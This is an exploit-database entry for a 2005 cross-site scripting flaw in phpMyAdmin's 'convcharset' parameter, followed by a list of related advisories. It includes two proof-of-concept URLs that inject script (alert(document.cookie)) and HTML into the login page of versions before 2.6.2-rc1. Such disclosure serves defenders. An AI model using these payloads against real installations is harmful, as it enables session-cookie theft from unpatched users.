Lucene search
Oriol Torrent SantiagoEDB-ID:25330HistoryApr 03, 2005 - 12:00 a.m.
phpMyAdmin 2.x - Convcharset Cross-Site Scripting
2005-04-0300:00:00
Oriol Torrent Santiago
www.exploit-db.com
23
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/12982/info
phpMyAdmin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input to the 'convcharset' parameter.
phpMyAdmin versions prior to 2.6.2-rc1 are affected by this issue.
http://www.example.com/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lang=en-iso-8859-1&convcharset=\"><script>alert(document.cookie)</script>
http://www.example.com/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lang=en-iso-8859-1&convcharset=\"><h1>XSS</h1> Related
freebsd
freebsd
phpmyadmin -- cross site scripting vulnerability
2005-04-03 00:00:00
openvas
openvas
FreeBSD Ports: phpmyadmin, phpMyAdmin
2008-09-04 00:00:00
FreeBSD Ports: phpmyadmin, phpMyAdmin
2008-09-04 00:00:00
Gentoo Security Advisory GLSA 200504-08 (phpMyAdmin)
2008-09-24 00:00:00
gentoo
gentoo
phpMyAdmin: Cross-site scripting vulnerability
2005-04-11 00:00:00
nessus
nessus
phpMyAdmin index.php convcharset Parameter XSS
2005-04-05 00:00:00
GLSA-200504-08 : phpMyAdmin: XSS vulnerability
2005-04-12 00:00:00
ubuntucve
ubuntucve
debiancve
debiancve
cve
cve
phpmyadmin
phpmyadmin
Cross-Site Scripting vulnerability
2005-04-03 00:00:00
cvelist
cvelist
nvd
nvd
prion
prion
Cross site scripting
2007-11-23 20:46:00
Cross site scripting
2007-01-18 02:28:00
securityvulns
securityvulns